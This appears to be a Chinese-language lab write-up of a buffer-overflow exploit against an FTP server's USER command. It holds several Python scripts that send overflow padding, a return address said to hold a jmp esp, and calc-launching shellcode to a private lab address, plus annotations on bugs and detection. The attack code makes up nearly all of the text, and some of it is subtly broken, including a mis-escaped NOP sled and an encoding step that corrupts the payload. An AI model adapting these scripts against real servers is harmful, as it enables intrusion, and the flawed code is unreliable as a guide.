開篇 無限接近成功
import socket
# Sixteen raw bytes; the ASCII "calc" (\x63\x61\x6C\x63) is visible in the middle.
buf1="\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
# USER argument layout: 485 filler bytes, a 4-byte marker ("EDCB" in ASCII), then buf1.
# The heading above calls this the run that pins EIP exactly; a distinctive
# marker makes the overwritten register value easy to recognise in a debugger.
buffer="A"*485+"\x45\x44\x43\x42"+buf1
# Plain TCP client to a hardcoded RFC 1918 lab address on the FTP control port.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.136.140",21))
# NOTE: rebinding the builtin name `str` shadows it for the rest of the module.
str="User "+buffer+"\r\n"
# The command line is built as text and converted with the default codec;
# the author's closing note singles out this step as the Python 2.7 / 3.x difference.
str=str.encode()
# send() may deliver fewer bytes than requested; its return value is ignored
# and the socket is never closed.
# Detection note: one FTP USER command several hundred bytes long and dominated
# by a single repeated filler byte is the classic overflow-attempt signature;
# on the server side a length check on the USER argument is the mitigation.
s.send(str)
數字準確填充EIP
鋪墊 離奇的填充EIP數值
不使用 encode 函數會引起報錯
# "Mysterious" c2 variant: intermediate version that swaps the marker for a fill address.
import socket
# Same 16-byte payload as the first run.
buf1="\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
# Layout: 485 filler bytes, a 4-byte value (presumably written little-endian — TODO confirm),
# 4 more filler bytes, then buf1.
buffer="A"*485+"\x7B\x46\x86\x7C"+"A"*4+buf1  # per the author, this address holds a jmp esp instruction in kernel32
# Hardcoded RFC 1918 lab target on the FTP control port.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.136.140",21))
# NOTE: rebinding the builtin name `str` shadows it for the rest of the module.
str="User "+buffer+"\r\n"
# Text-to-bytes conversion with the default codec before sending (see the closing note).
str=str.encode()
# Return value of send() ignored; socket never closed.
s.send(str)
# c3 variant: fills in the first byte of the 4-byte value.
import socket
# Same 16-byte payload as the earlier runs.
buf1="\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
buffer="A"*485+"\xD7\x30\x5A\x7D"+"A"*4+buf1  # same layout as c2; only the 4-byte value differs
# Hardcoded RFC 1918 lab target on the FTP control port.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.136.140",21))
# NOTE: rebinding the builtin name `str` shadows it for the rest of the module.
str="User "+buffer+"\r\n"
# Text-to-bytes conversion with the default codec before sending (see the closing note).
str=str.encode()
# Return value of send() ignored; socket never closed.
s.send(str)
轉折 目標鎖定encode函數
# Runs under Python 2.7; fails under 3.5.
import socket
buf1="\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
# NOTE: in this version `buffer` (and therefore buf1) is built but never used;
# the USER line below is assembled piece by piece instead.
buffer="A"*485+"\xD7\x30\x5A\x7D"+"A"*4+buf1 #
# Hardcoded RFC 1918 lab target on the FTP control port.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.136.140",21))
# NOTE: rebinding the builtin name `str` shadows it for the rest of the module.
str = "User "
str += "A"*485
str += "\xD7\x30\x5A\x7D"
# NOTE(review): `\9` is not a recognised Python escape sequence — confirm this
# literal yields what was intended.
str += "\90"*10
str += "\r\n"
# The encode step is disabled here, so `str` stays a text object.
# str=str.encode()
# On Python 3, socket.send() requires a bytes-like object and raises TypeError
# for a str; on Python 2 a str is already a byte string. That matches the
# header's "2.7 passes, 3.5 fails". Return value ignored; socket never closed.
s.send(str)
已查閱關於 python 的相關文檔，但對 encode() 函數的底層編譯實現未有太多解釋。後續填坑考慮使用 python 生成可執行程序，通過 IDA 和調試器解決填充問題。